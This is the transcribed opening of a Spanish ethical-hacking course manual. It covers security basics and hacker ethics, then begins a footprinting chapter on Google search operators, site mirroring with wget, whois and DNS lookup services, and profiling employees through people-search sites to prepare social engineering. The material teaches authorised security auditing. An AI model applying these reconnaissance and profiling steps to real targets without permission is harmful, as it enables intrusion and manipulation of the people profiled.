"If you're a good hacker, everyone knows your name. If you're a great hacker, no one knows who you are"

Tamaño: px
Comenzar la demostración a partir de la página:

Download ""If you're a good hacker, everyone knows your name. If you're a great hacker, no one knows who you are""

Transcripción

1

2 "If you're a good hacker, everyone knows your name. If you're a great hacker, no one knows who you are" This document is licensed under the Attribution-ShareAlike 3.0 Unported license, available at

3 INDICE INFORMACION DEL AUTOR...4 INTRODUCCION A LA SEGURIDAD...5 FILOSOFIA HACKER...12 FOOTPRINTING...17 GOOGLE HACKING...25 SCANNING & ENUMERATION...29 SYSTEM HACKING...33 DENEGACION DE SERVICIO...39 PREVINIENDO UN DoS...45 INGENIERIA SOCIAL...48 HIJACKING...58 SESSION HIJACKING...59 VULNERABILIDADES EN APLICACIONES WEB...61 W3AF EVASION DE FIREWALLS...76 EVASION DE IDS...83 HONEYPOTS...87 CRIPTOGRAFIA PROTECCION DE DATOS...91 FIRMA DIGITAL...93 GPG (Gnu Privacy Guard)...94 TALLER DE APACHE SECURITY TALLER DE IPTABLES TALLER DE SNORT...124

4 INFORMACION DEL AUTOR José María Schenone Profesional con más de 15 años de experiencia real trabajando en diferentes empresas y organizmos del estado coordinando y realizando implementaciones con Linux. Hace 3 años que se desempeña como instructor en cursos relacionados con Linux y Seguridad Informática. Vive en Buenos Aires y actualmente es el CEO y Director de su propia consultora. Coordinador del área de capacitación profesional en dotlinux Training Consultor en Seguridad y GNU/Linux Administrador de Redes Linux con mas de 15 años de experiencia Consultor para el proyecto "Debian Linux" en Argentina (http://www.debian.org) Fundador de la Asociación Argentina de Hackers Eticos (http://www.oahe.org.ar) Coordinador de las Conferencias Latinoamericanas de Seguridad (http://www.conlaseg.org) Como consultor independiente, desarrolló y participó en la implementación de soluciones en lugares como: Ministerio de Defensa de la República Argentina Dirección General de Administración de Infracciones (Gobierno de la Ciudad de Buenos Aires) Unidad Administrativa de Control de Faltas (Gobierno de la Ciudad de Buenos Aires) Educ.ar Sistema de Observaciones y Recomendaciones para el Gobierno de la Ciudad de Buenos Aires Facultad de Filosofía y Letras (UBA) Instituto Nacional de Servicios Sociales para Jubilados y Pensionados Caja de Valores S.A. - Central Depositaria Argentina Telecom Personal Argentina Techint Argentina Forma de Contacto para Consultas

5 INTRODUCCION A LA SEGURIDAD Qué es la Seguridad Informática? La seguridad informática es el área de la informática que se enfoca en la protección de la infraestructura computacional y todo lo relacionado con esta (incluyendo la información contenida). Para ello existen una serie de estándares, protocolos, métodos, reglas, herramientas y leyes concebidas para minimizar los posibles riesgos a la infraestructura o a la información. La seguridad informática comprende software, bases de datos, metadatos, archivos y todo lo que la organización valore (activo) y signifique un riesgo si ésta llega a manos de otras personas. Este tipo de información se conoce como información privilegiada o confidencial. El concepto de seguridad de la información no debe ser confundido con el de seguridad informática, ya que este último sólo se encarga de la seguridad en el medio informático, pudiendo encontrar información en diferentes medios o formas. Objetivos de la seguridad informática La seguridad informática está concebida para proteger los activos informáticos, entre los que se encuentran: La información contenida : Se ha convertido en uno de los elementos más importantes dentro de una organización. La seguridad informática debe ser administrada según los criterios establecidos por los administradores y supervisores, evitando que usuarios externos y no autorizados puedan acceder a ella sin autorización. De lo contrario la organización corre el riesgo de que la información sea utilizada maliciosamente para obtener ventajas de ella o que sea manipulada, ocasionando lecturas erradas o incompletas de la misma. Otra función de la seguridad informática en esta área es la de asegurar el acceso a la información en el momento oportuno, incluyendo respaldos de la misma en caso de que esta sufra daños o pérdida producto de accidentes, atentados o desastres. La infraestructura computacional : Una parte fundamental para el almacenamiento y gestión de la información, así como para el funcionamiento mismo de la organización. La función de la seguridad informática en esta área es velar que los equipos funcionen adecuadamente y prever en caso de falla planes de robos, incendios, boicot, desastres naturales, fallas en el suministro eléctrico y cualquier otro factor que atente contra la infraestructura informática. Los usuarios : Son las personas que utilizan la estructura tecnológica, zona de comunicaciones y que gestionan la información. La seguridad informática debe establecer normas que minimicen los riesgos a la información o infraestructura informática. Estas normas incluyen horarios de funcionamiento, restricciones a ciertos lugares, autorizaciones, denegaciones, perfiles de usuario, planes de emergencia, protocolos y todo lo necesario que permita un buen nivel de seguridad - 5 -

6 informática minimizando el impacto en el desempeño de los funcionarios y de la organización en general y como principal contribuyente al uso de programas realizados por programadores. Las amenazas Una vez que la programación y el funcionamiento de un dispositivo de almacenamiento (o transmisión) de la información se consideran seguras, todavía deben ser tenidos en cuenta las circunstancias "no informáticas" que pueden afectar a los datos, las cuales son a menudo imprevisibles o inevitables, de modo que la única protección posible es la redundancia (en el caso de los datos) y la descentralización -por ejemplo mediante estructura de redes- (en el caso de las comunicaciones). Estos fenómenos pueden ser causados por: El usuario: causa del mayor problema ligado a la seguridad de un sistema informático (porque no le importa, no se da cuenta o a propósito). Programas maliciosos: programas destinados a perjudicar o a hacer un uso ilícito de los recursos del sistema. Es instalado (por inatención o maldad) en el ordenador abriendo una puerta a intrusos o bien modificando los datos. Estos programas pueden ser un virus informático, un gusano informático, un troyano, una bomba lógica o un programa espía o Spyware. Un intruso: persona que consigue acceder a los datos o programas de los cuales no tiene acceso permitido (cracker, defacer, script kiddie o Script boy, viruxer, etc.). Un siniestro (robo, incendio, inundación): una mala manipulación o una malintención derivan a la pérdida del material o de los archivos. El personal interno de Sistemas: Las pujas de poder que llevan a disociaciones entre los sectores y soluciones incompatibles para la seguridad informática. Tipos de amenaza El hecho de conectar una red a un entorno externo nos da la posibilidad de que algún atacante pueda entrar en ella, con esto, se puede hacer robo de información o alterar el funcionamiento de la red. Sin embargo el hecho de que la red no sea conectada a un entorno externo no nos garantiza la seguridad de la misma. De acuerdo con el Computer Security Institute (CSI) de San Francisco aproximadamente entre 60 y 80 por ciento de los incidentes de red son causados desde adentro de la misma. Basado en esto podemos decir que existen 2 tipos de amenazas: Amenazas internas: Generalmente estas amenazas pueden ser más serias que las externas por varias razones como son: Los usuarios conocen la red y saben cómo es su funcionamiento Tienen algún nivel de acceso a la red por las mismas necesidades de su trabajo - 6 -

7 Los IPS y Firewalls son mecanismos no efectivos en amenazas internas Esta situación se presenta gracias a los esquemas ineficientes de seguridad con los que cuentan la mayoría de las compañías a nivel mundial, y porque no existe conocimiento relacionado con la planeación de un esquema de seguridad eficiente que proteja los recursos informáticos de las actuales amenazas combinadas. El resultado es la violación de los sistemas, provocando la pérdida o modificación de los datos sensibles de la organización, lo que puede representar un daño con valor de miles o millones de dólares. Amenazas externas: Son aquellas amenazas que se originan de afuera de la red. Al no tener información certera de la red, un atacante tiene que realizar ciertos pasos para poder conocer qué es lo que hay en ella y buscar la manera de atacarla. La ventaja que se tiene en este caso es que el administrador de la red puede prevenir una buena parte de los ataques externos. La amenaza informática del futuro Si en un momento el objetivo de los ataques fue cambiar las plataformas tecnológicas ahora las tendencias cibercriminales indican que la nueva modalidad es manipular los significados de la información digital. El área semántica, era reservada para los humanos, se convirtió ahora en el núcleo de los ataques debido a la evolución de la Web 2.0 y las redes sociales, factores que llevaron al nacimiento de la generación 3.0. Se puede afirmar que la Web 3.0 otorga contenidos y significados de manera tal que pueden ser comprendidos por las computadoras, las cuales -por medio de técnicas de inteligencia artificial- son capaces de emular y mejorar la obtención de conocimiento, hasta el momento reservada a las personas. Es decir, se trata de dotar de significado a las páginas Web, y de ahí el nombre de Web semántica o Sociedad del Conocimiento, como evolución de la ya pasada Sociedad de la Información En este sentido, las amenazas informáticas que viene en el futuro ya no son con la inclusión de troyanos en los sistemas o softwares espías, sino con el hecho de que los ataques se han profesionalizado y manipulan el significado del contenido virtual. La Web 3.0, basada en conceptos como elaborar, compartir y significar, está representando un desafío para los hackers que ya no utilizan las plataformas convencionales de ataque, sino que optan por modificar los significados del contenido digital, provocando así la confusión lógica del usuario y permitiendo de este modo la intrusión en los sistemas, La amenaza ya no solicita la clave de homebanking del desprevenido usuario, sino que directamente modifica el balance de la cuenta, asustando al internauta y, a partir de allí, sí efectuar el robo del capital. Para no ser presa de esta nueva ola de ataques más sutiles, Se recomienda: Mantener las soluciones activadas y actualizadas. Evitar realizar operaciones comerciales en computadoras de uso público

8 Verificar los archivos adjuntos de mensajes sospechosos y evitar su descarga en caso de duda. Análisis de riesgos El activo más importante que se posee es la información y, por lo tanto, deben existir técnicas que la aseguren, más allá de la seguridad física que se establezca sobre los equipos en los cuales se almacena. Estas técnicas las brinda la seguridad lógica que consiste en la aplicación de barreras y procedimientos que resguardan el acceso a los datos y sólo permiten acceder a ellos a las personas autorizadas para hacerlo. Existe un viejo dicho en la seguridad informática que dicta: "lo que no está permitido debe estar prohibido" y ésta debe ser la meta perseguida. Los medios para conseguirlo son: 1. Restringir el acceso (de personas de la organización y de las que no lo son) a los programas y archivos. 2. Asegurar que los operadores puedan trabajar pero que no puedan modificar los programas ni los archivos que no correspondan (sin una supervisión minuciosa). 3. Asegurar que se utilicen los datos, archivos y programas correctos en/y/por el procedimiento elegido. 4. Asegurar que la información transmitida sea la misma que reciba el destinatario al cual se ha enviado y que no le llegue a otro. 5. Asegurar que existan sistemas y pasos de emergencia alternativos de transmisión entre diferentes puntos. 6. Organizar a cada uno de los empleados por jerarquía informática, con claves distintas y permisos bien establecidos, en todos y cada uno de los sistemas o aplicaciones empleadas. 7. Actualizar constantemente las contraseñas de accesos a los sistemas de cómputo. Puesta en marcha de una política de seguridad Actualmente las legislaciones nacionales de los Estados, obligan a las empresas, instituciones públicas a implantar una política de seguridad. Ej: En España la Ley Orgánica de Protección de Datos o también llamada LOPD y su normativa de desarrollo. Generalmente se ocupa exclusivamente a asegurar los derechos de acceso a los datos y recursos con las herramientas de control y mecanismos de identificación. Estos mecanismos permiten saber que los operadores tienen sólo los permisos que se les dio. La seguridad informática debe ser estudiada para que no impida el trabajo de los operadores en lo que les es necesario y que puedan utilizar el sistema informático con toda confianza. Por eso en lo referente a elaborar una política de seguridad, conviene: - 8 -

9 Elaborar reglas y procedimientos para cada servicio de la organización. Definir las acciones a emprender y elegir las personas a contactar en caso de detectar una posible intrusión Sensibilizar a los operadores con los problemas ligados con la seguridad de los sistemas informáticos. Los derechos de acceso de los operadores deben ser definidos por los responsables jerárquicos y no por los administradores informáticos, los cuales tienen que conseguir que los recursos y derechos de acceso sean coherentes con la política de seguridad definida. Además, como el administrador suele ser el único en conocer perfectamente el sistema, tiene que derivar a la directiva cualquier problema e información relevante sobre la seguridad, y eventualmente aconsejar estrategias a poner en marcha, así como ser el punto de entrada de la comunicación a los trabajadores sobre problemas y recomendaciones en término de seguridad informática. Técnicas para asegurar el sistema Codificar la información: Criptología, Criptografía y Criptociencia, contraseñas difíciles de averiguar a partir de datos personales del individuo. Vigilancia de red. Zona desmilitarizada Tecnologías repelentes o protectoras: cortafuegos, sistema de detección de intrusos - antispyware, antivirus, llaves para protección de software, etc. Mantener los sistemas de información con las actualizaciones que más impacten en la seguridad. Sistema de Respaldo Remoto. Servicio de backup remoto Respaldo de Información La información constituye el activo más importante de las empresas, pudiendo verse afectada por muchos factores tales como robos, incendios, fallas de disco, virus u otros. Desde el punto de vista de la empresa, uno de los problemas más importantes que debe resolver es la protección permanente de su información crítica. La medida más eficiente para la protección de los datos es determinar una buena política de copias de seguridad o backups: Este debe incluir copias de seguridad completa (los datos son almacenados en su totalidad la primera vez) y copias de seguridad incrementales (sólo se copian los archivos creados o modificados desde el último backup). Es vital para las empresas elaborar un plan de backup en función del volumen de información generada y la cantidad de equipos críticos. Un buen sistema de respaldo debe contar con ciertas características indispensables: Continuo : El respaldo de datos debe ser completamente automático y continuo. Debe funcionar de forma transparente, sin intervenir en las tareas que se encuentra realizando el usuario. Seguro : Muchos softwares de respaldo incluyen cifrado de datos ( bits), lo - 9 -

10 cual debe ser hecho localmente en el equipo antes del envío de la información. Remoto : Los datos deben quedar alojados en dependencias alejadas de la empresa. Mantención de versiones anteriores de los datos : Se debe contar con un sistema que permita la recuperación de versiones diarias, semanales y mensuales de los datos. Hoy en día los sistemas de respaldo de información online (Servicio de backup remoto) están ganando terreno en las empresas y organismos gubernamentales. La mayoría de los sistemas modernos de respaldo de información online cuentan con las máximas medidas de seguridad y disponibilidad de datos. Estos sistemas permiten a las empresas crecer en volumen de información sin tener que estar preocupados de aumentar su dotación física de servidores y sistemas de almacenamiento. Consideraciones de software Tener instalado en la máquina únicamente el software necesario reduce riesgos. Así mismo tener controlado el software asegura la calidad de la procedencia del mismo (el software obtenido de forma ilegal o sin garantías aumenta los riesgos). En todo caso un inventario de software proporciona un método correcto de asegurar la reinstalación en caso de desastre. El software con métodos de instalación rápidos facilita también la reinstalación en caso de contingencia. Existe un software que es conocido por la cantidad de agujeros de seguridad que introduce. Se pueden buscar alternativas que proporcionen iguales funcionalidades pero permitiendo una seguridad extra. Consideraciones de una red Los puntos de entrada en la red son generalmente el correo, las páginas web y la entrada de archivos desde discos, o de ordenadores ajenos, como portátiles. Mantener al máximo el número de recursos de red sólo en modo lectura, impide que ordenadores infectados propaguen virus. En el mismo sentido se pueden reducir los permisos de los usuarios al mínimo. Se pueden centralizar los datos de forma que detectores de virus en modo batch puedan trabajar durante el tiempo inactivo de las máquinas. Controlar y monitorizar el acceso a Internet puede detectar, en fases de recuperación, cómo se ha introducido el virus

11 Algunas afirmaciones erróneas comunes acerca de la seguridad Mi sistema no es importante para un cracker Esta afirmación se basa en la idea de que no introducir contraseñas seguras en una empresa no entraña riesgos pues quién va a querer obtener información mía?. Sin embargo, dado que los métodos de contagio se realizan por medio de programas automáticos, desde unas máquinas a otras, estos no distinguen buenos de malos, interesantes de no interesantes, etc. Por tanto abrir sistemas y dejarlos sin claves es facilitar la vida a los virus. Estoy protegido pues no abro archivos que no conozco Esto es falso, pues existen múltiples formas de contagio, además los programas realizan acciones sin la supervisión del usuario poniendo en riesgo los sistemas. Como tengo antivirus estoy protegido En general los programas antivirus no son capaces de detectar todas las posibles formas de contagio existentes, ni las nuevas que pudieran aparecer conforme los ordenadores aumenten las capacidades de comunicación, además los antivirus son vulnerables a desbordamientos de búfer que hacen que la seguridad del sistema operativo se vea más afectada aún. Como dispongo de un firewall no me contagio Esto únicamente proporciona una limitada capacidad de respuesta. Las formas de infectarse en una red son múltiples. Unas provienen directamente de accesos al sistema (de lo que protege un firewall) y otras de conexiones que se realizan (de las que no me protege). Emplear usuarios con altos privilegios para realizar conexiones puede entrañar riesgos, además los firewalls de aplicación (los más usados) no brindan protección suficiente contra el spoofing. Tengo un servidor web cuyo sistema operativo es un Unix actualizado a la fecha Puede que este protegido contra ataques directamente hacia el núcleo, pero si alguna de las aplicaciones web (PHP, Perl, Cpanel, etc.) está desactualizada, un ataque sobre algún script de dicha aplicación puede permitir que el atacante abra una shell y por ende ejecutar comandos en el unix. Organismos oficiales de seguridad informática Existen organismos oficiales encargados de asegurar servicios de prevención de riesgos y asistencia a los tratamientos de incidencias, tales como el CERT/CC (Computer Emergency Response Team Coordination Center) del SEI (Software Engineering Institute) de la Carnegie Mellon University el cual es un centro de alerta y reacción frente a los ataques informáticos, destinados a las empresas o administradores, pero generalmente estas informaciones son accesibles a todo el mundo

12 FILOSOFIA HACKER Qué es el ethical hacking? El "ethical hacking" o "ética hacker" es una nueva ética surgida de y aplicada a las comunidades virtuales o cibercomunidades, aunque no exclusivamente. La expresión se suele atribuir al periodista Steven Levy en su ensayo seminal Hackers: Heroes of the Computer Revolution, publicado en 1984, donde describe y enuncia con detalle los principios morales que surgieron a finales de los años cincuenta en el Laboratorio de Inteligencia Artificial del MIT y, en general, en la cultura de los aficionados a la informática de los años sesenta y setenta. Aquellos principios --que se resumen en el acceso libre a la información y en que la informática puede mejorar la calidad de vida de las personas-- han constituido la base de la mayor parte de definiciones que se han elaborado posteriormente. Uno de sus mentores actuales ha sido el finlandés Pekka Himanen. Himanen en su obra La ética del hacker y el espíritu de la era de la información (que contiene un prólogo de Linus Torvalds y un epílogo de Manuel Castells), comienza por rescatar una de las acepciones originales del término 'hacker'. Según Himanen, un hacker no es un delincuente, vándalo o pirata informático con altos conocimientos técnicos (a los que prefiere llamar crackers), sino que hacker es todo aquel que trabaja con gran pasión y entusiasmo por lo que hace. De ahí que el término 'hacker' pueda y deba extrapolarse a otros ámbitos como ser, por ejemplo, el científico. Así Himanen escribe, En el centro de nuestra era tecnológica se hallan unas personas que se autodenominan hackers. Se definen a sí mismos como personas que se dedican a programar de manera apasionada y creen que es un deber para ellos compartir la información y elaborar software gratuito. No hay que confundirlos con los crackers, los usuarios destructivos cuyo objetivo es el de crear virus e introducirse en otros sistemas: un hacker es un experto o un entusiasta de cualquier tipo que puede dedicarse o no a la informática. En este sentido, la ética hacker es una nueva moral que desafía la ética protestante del trabajo, tal como la expuso hace casi un siglo Max Weber en su obra clásica La ética protestante y el espíritu del capitalismo, y que está fundada en la laboriosidad diligente, la aceptación de la rutina, el valor del dinero y la preocupación por la cuenta de resultados. Frente a la moral presentada por Weber, la ética del trabajo para el hacker se funda en el valor de la creatividad, y consiste en combinar la pasión con la libertad. El dinero deja de ser un valor en sí mismo y el beneficio se cifra en metas como el valor social y el libre acceso, la transparencia y la franqueza. Valores fundamentales La ética hacker es una ética de tipo axiológico, es decir, una ética basada en una determinada serie de valores. Himanen rescata algunos fundamentales, a saber: Pasión Libertad

13 Conciencia social Verdad Anti-corrupción Lucha contra la alienación del hombre Igualdad social Libre acceso a la información (conocimiento libre) Valor social (reconocimiento entre semejantes) Accesibilidad Actividad Preocupación responsable Curiosidad Creatividad Otros aspectos que resaltan de esta ética, es una frase muy sonada y maravillosa: "Ningún problema debería resolverse 2 veces", aludiendo a que el tiempo de los demás es muy valioso, y cuando resuelvas algo comunicalo a todos tus compañeros hackers para que puedan resolver otros problemas, aumentando la productividad. Qué es un cracker? El término cracker (del inglés crack, romper) se utiliza para referirse a las personas que rompen algún sistema de seguridad. Los crackers pueden estar motivados por una multitud de razones, incluyendo fines de lucro, protesta, o simplemente por el desafío de hacerlo. A partir de 1980 había aparecido la cultura hacker, programadores aficionados o personas destacadas o con un importante conocimiento de informática. Estos programadores no solían estar del lado de la ilegalidad, y aunque algunos conocían técnicas para burlar sistemas de seguridad, se mantenían dentro del ámbito legal. Pero con el tiempo surgieron personas que utilizando su conocimiento en informática, aprovechaban debilidades o bugs de algunos sistemas informáticos y los crackeaban, es decir, burlaban el sistema de seguridad muchas veces entrando en la ilegalidad y algunos considerando estas prácticas como "malas". A estas personas se las continuó llamando hackers, por lo que alrededor de 1985 los hackers "originales" empezaron a llamarlos crackers en contraposición al término hacker, en defensa de éstos últimos por el uso incorrecto del término. Por ello los crackers son criticados por la mayoría de hackers, por el desprestigio que les supone ante la opinión pública y las empresas ya que muchas veces, inclusive en los medios de comunicación, no hacen diferencia entre el término hacker y cracker creando confusión sobre la definición de los mismos y aparentando un significado similar

14 Distintos usos del término Se suele referir a una persona como cracker cuando: Mediante ingeniería inversa realiza: seriales, keygens y cracks, los cuales sirven para modificar el comportamiento o ampliar la funcionalidad del software o hardware original al que se aplican, y se los suele utilizar para saltearse restricciones como por ejemplo que un programa deje de funcionar a un determinado tiempo, o que sólo funcione si es instalado desde un CD original, etc. Viola la seguridad de un sistema informático y, por ejemplo, toma control de este, obtiene información, borra datos, etc. En ambos casos dichas prácticas suelen ser ilegales y penadas por la ley. Legalidad Muchos programas informáticos, usualmente los privativos, no permiten la modificación o estudio del funcionamiento del programa, esto hace que el hecho de realizar ingeniería inversa para poder generar un serial o un crack sea ilegal. En ocasiones el cracking es la única manera de realizar cambios sobre software para el que su fabricante no presta soporte, especialmente cuando lo que se quiere es, o corregir defectos, o exportar datos a nuevas aplicaciones, en estos casos en la mayoría de legislaciones no se considera el cracking como actividad ilegal,[cita requerida] incluso a veces la empresa que desarrolló el software ya no existe o ya no posee los derechos sobre el producto. A su vez cuando una persona penetra en un sistema ajeno sin su autorización, se comete una violación a la propiedad privada, se suele dar el ejemplo de que es ilegal entrar sin permiso a la casa de otra persona, por más de que la puerta esté abierta. Aunque también las tácticas utilizadas por los crackers para violar los sistemas de seguridad suelen ser utilizadas por empresas de seguridad informática u otras personas para testear la seguridad de un programa o computadora, en dicho caso como se tiene el permiso para realizar el "ataque" o bien, es el mismo dueño de la computadora el que lo realiza, ya no es una práctica ilegal y entraría en disputa también el uso del término cracker para dichos actos, por esto se han creado diversas leyes que tratan de solucionar estas diferencias. Qué es un hacker? Un hacker es una persona apasionada por la seguridad informática. Esto concierne principalmente a entradas remotas no autorizadas por medio de redes de comunicación como Internet ("Black hats"). Pero también incluye a aquellos que depuran y arreglan errores en los sistemas ("White hats") y a los de moral ambigua como son los "Grey hats". Los hackers son son una comunidad de entusiastas programadores y diseñadores de sistemas originada en los sesenta alrededor del Instituto Tecnológico de Massachusetts (MIT), el Tech Model Railroad Club (TMRC) y el Laboratorio de Inteligencia Artificial del MIT. Esta comunidad se caracteriza por el lanzamiento del movimiento de software libre. La World Wide Web e Internet en sí misma son creaciones de hackers. El RFC amplia este significado como "persona que se disfruta de un conocimiento profundo del

15 funcionamiento interno de un sistema, en particular de computadoras y redes informáticas" Muchos hackers pertenecen a la comunidad de aficionados a la informática doméstica, centrada en el hardware posterior a los setenta y en el software (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa. En la actualidad el término hacker se utiliza de forma corriente para referirse mayormente a los criminales informáticos, debido a su utilización masiva por parte de los medios de comunicación desde la década de A los criminales se le pueden sumar los llamados "script kiddies", gente que invade computadoras, usando programas escritos por otros, y que tiene muy poco conocimiento sobre como funcionan. Este uso parcialmente incorrecto se ha vuelto tan predominante que, en general, un gran segmento de la población no es consciente de que existen diferentes significados. Mientras que los hackers aficionados reconocen los tres tipos de hackers y los hackers de la seguridad informática aceptan todos los usos del término, los hackers del software libre consideran la referencia a intrusión informática como un uso incorrecto de la palabra, y se refieren a los que rompen los sistemas de seguridad como "crackers" (analogía de "safecracker", que en español se traduce como "un ladrón de cajas fuertes"). Controversia y ambigüedad En un principio se utilizaba "hack" como verbo para expresar "perder el tiempo" (e.j. "Puedo hackear con el ordenador"), el significado del término ha cambiado a lo largo de décadas desde que empezó a utilizarse en un contexto informático. Como su uso se ha extendido más ampliamente, el significado primario de la palabra, por parte de los nuevos usuarios, ha pasado a uno que entra en conflicto con el énfasis original. El Emblema Hacker El Emblema Hacker fue propuesto primero en Octubre de 2003 por Eric S. Raymond, alegando la necesidad de una unificación y un símbolo reconocible para la percepción de la cultura hacker. Esto no se refiere a la acción de infringir ó irrumpir sin permiso en los computadores/ordenadores. Tal acción es realizada por los llamados crackers. El emblema Hacker

16 Raymond ha dicho que uno no pretende ser un hacker sólo para mostrar este emblema, pero sugiere que: "el uso de este emblema expresa la solidaridad con los objetivos y valores de los hackers, y la forma de vivir de un hacker" La imagen en sí misma es una representación de un planeador (Glider), una formación en el Juego de la vida de John Conway que viaja en todos los ámbitos. Se descubrió por primera vez por Richard K. Guy. Es la más pequeña nave espacial, y se desplaza en forma diagonal a una velocidad de c/4. El planeador es a menudo producido a partir de generaciones preconfiguradas aleatorias. Los planeadores son importantes para el juego de la vida porque son producidas con facilidad, pueden ser colisionado entre sí para formar objetos más complejos, y puede utilizarse para transmitir información a largas distancias. Eric S. Raymond ha propuesto al planeador como un emblema para representar a los hackers porque: El planeador (Glider) "nació casi al mismo tiempo que el Internet y Unix". El Juego de la vida hace un llamamiento a los hackers

17 FOOTPRINTING Qúe es el Footprinting? El Footprinting consiste en la búsqueda de toda la información pública, bien porque haya sido publicada a propósito o bien porque haya sido publicada por desconocimiento (abierta, y por tanto no estaremos incurriendo en ningún delito, además la entidad ni debería detectarlo) que pueda haber sobre el sistema que se va a auditar, es decir, buscaremos todas las huellas posibles, desde direcciones IP, servidores internos, cuentas de correo de los usuarios, nombres de máquinas, información del registrador del dominio, tipos de servidores, archivos con cuentas y/o credenciales de usuarios, impresoras, cámaras IP, metadatos, etc. Cualquier dato que nos pueda ser de utilidad para lanzar distintos ataques en las fases posteriores de la auditoría. Si enumeramos los pasos genéricos para realizar un Test de Intrusión, el proceso de Footprinting sería el primero de ellos: Footprinting Fingerprinting Análisis de vulnerabilidades Explotación de vulnerabilidades Generación de informes En este capitulo veremos las practicas más comunes para realizar una búsqueda de información. Pongamos como ejemplo que tenemos que auditar al instituto que tiene en el dominio su sitio Web y desde el que se pueden conectar a distintos servicios que ofrece. Visitar el sitio Web El primer paso será evidentemente entrar en el sitio Web que vamos a auditar. Deberemos navegar por todas sus páginas y aplicaciones, ya que nunca sabemos que nos vamos a encontrar. Es habitual, sobretodo en sitios Web muy grandes, que se dejen olvidados enlaces a sitios que no deberían estar, o algún error en una llamada a BBDD (algo más común de lo que se piensa verdad? ). Tras hacernos una idea del estado de la web continuaremos con el siguiente paso. Qué saben los buscadores de nuestro objetivo? El segundo paso de cualquier proceso de Footprinting sería preguntar a Google, Bing, etc. por el dominio del que queremos obtener información. Lo bueno (o malo según se mire ) de los buscadores es que sus crawlers suelen indexar en ocasiones ciertas páginas que no deberían haberse publicado, pero que han estado cierto tiempo visibles desde Internet mientras se estaban probando, y han quedado cacheadas en Google. Por lo tanto

18 podríamos verlas mirando la caché o con algún servicio como archive.org Continuaremos con las búsquedas hacking, utilizando diferentes verbos para refinar un poco más las búsquedas. Por ejemplo, es interesante ver que saben o dicen los demás de nuestro objetivo, para ello podemos ayudarnos de la siguiente búsqueda en Google, donde el - indíca que queremos ver todos los resultados menos los del dominio objetivo: dotlinux -site:dotlinux.com.ar Algunos verbos a destacar serían: site: para listar toda la información de un dominio concreto. filetype o ext: para buscar archivos de un formato determinado, por ejemplo pdf, rdp (de escritorio remoto), imágenes png, jpg, etc. para obtener información EXIF y un largo etcétera. intitle: para buscar páginas con ciertas palabras en el campo title inurl: para buscar páginas con ciertas palabras en la URL. O buscar por ejemplo por la frase index of para encontrar listados de archivos de ftps, etc. Una vez que hayamos realizado algunas búsquedas específicas será interesante listar todas las páginas que pendan del dominio raíz. Para ello podemos ayudarnos de la búsqueda: site:dotlinux.com.ar En este punto podríamos leernos el código fuente de las distintas páginas encontradas, para ver si hay comentarios escritos por los programadores (algo común) u otros datos que puedan ser de utilidad. Por ejemplo, en una ocasión me encontré con un comentario muy curioso que decía algo como lo siguiente: <! Comentario del Diseñador al Programador, el usuario para conectarse a la BBDD es PEPITO y la clave MENGANITO--> Si quieren trabajar un poco menos pueden descargarse el sitio web entero con la herramienta wget y hacer búsquedas directamente sobre la carpeta donde esté el sitio web descargado utilizando un grep, que realiza búsquedas muy rápidas sobre el contenido de los archivos de una carpeta. Wget puede trabajar bajando archivos en forma recursiva mediante el protocolo HTTP o FTP. La sintaxis de URL utilizada es la estándar: Normalmente no se necesitan opciones, salvo que se desee modificar el comportamiento estándar de wget. La lista de las opciones más comunes en el uso de wget es la siguiente: -h help -v verbose

19 -nv no verbose (muestra solo mensajes de error) -q quiet (no muestra mensajes) -i filename lee la lista de URLs de 'filename' --follow-ftp sigue enlaces FTP desde documentos HTML -l depth cambia el nivel de recursividad a 'depth' (default 5) -r modo recursivo -nc no baja los archivos ya bajados (permite seguir de donde nos quedamos la última vez) Para más datos sobre su utilización chequear 'man wget' e 'info wget'. Ahora que tenemos mas informacion sobre los sitios, podremos hacer una consulta rapida para saber la ubicación del servidor y su IP utilizando el servicio de También podremos encontrarnos con que varios dominios compartan una IP (virtual hosts), para buscarlos nos será de especial utilidad el buscador Bing con su verbo IP Servicios Web de búsqueda de información de un dominio El siguiente paso que vamos a seguir en la búsqueda de información será el uso de distintos servicios Web que hay por Internet y que nos permitirán analizar ciertos datos del dominio objetivo como por ejemplo su dirección IP, los subdominios que cuelgan del dominio principal, su registrador mediante consultas Whois, su localización en mapas, trazas, servidores de DNS, etc. Netcraft (http://searchdns.netcraft.com) Este servicio nos permitirá analizar la información de un determinado dominio, proporcionándonos datos como sus direcciones IP, Servidores Web, Sistemas Operativos, etc. Cuwhois (http://www.cuwhois.com/) Una auténtica navaja suiza. En la parte superior de la página tenemos enlazadas todas las herramientas que incorpora: Entre los datos más interesantes que nos podrá aportar se encuentran la IP, Servidores DNS, Registrador del dominio, País, Idioma, Lenguaje de programación del sitio Web, codificación, modelo del Servidor Web, la posición en distintos rankings, feeds, incluso si comparte servidor Web con otras páginas nos proporcionará un listado con sus vecinos. IPTools (http://www.iptools.com/) Es otro servicio Web parecido a Cuwhois que incorpora gran cantidad de herramientas. Robtex (http://www.robtex.com/) Otro servicio parecido a Cuwhois, muy completo, que cuenta también con una gran cantidad de herramientas Yougetsignal (http://www.yougetsignal.com/) Otro todo en uno como Cuwhois, Robtex, etc. Intodns (http://www.intodns.com/) Herramienta para verificar el funcionamiento correcto de los servidores DNS y de correo que podremos utilizar para obtener información de los mismos

20 Freednsinfo (http://www.freednsinfo.com/) Otra herramientä semejante a IPTools Dnsstuff (http://www.dnsstuff.com) Es un servicio similar a los anteriores, aunque no es gratuito. Dnsenquirty (http://www.dnsenquiry.com/) Otro servicio que nos permitirá analizar el whois, dns lookup y ping Visualware (http://visualroute.visualware.com/) Servicio Web que nos permitirá seguir visualmente el camino que se recorre hasta llegar a la IP del servidor objetivo. Requiere Java 123people (http://www.123people.es/) Con este servicio podremos buscar información sobre personas a partir de su nombre, nos será de utilidad para saber información de una persona cuando hayamos conseguido su nombre a través de metadatos, registro Whois, etc. Nos ayudará a encontrar sus posibles blogs, vídeos subidos a youtube, publicaciones, etc. Analizaremos un poco de su vida para futuros ataques con ingeniería social. Finalmente la última técnica que veremos será el análisis de cabeceras de los correos electrónicos. Para ello será clave que consigamos que alguien de la organización a auditar nos envíe un , o tengan un sistema con el que podamos enviarlo nosotros mismos, como los típicos de enviar esta noticia a un amigo :

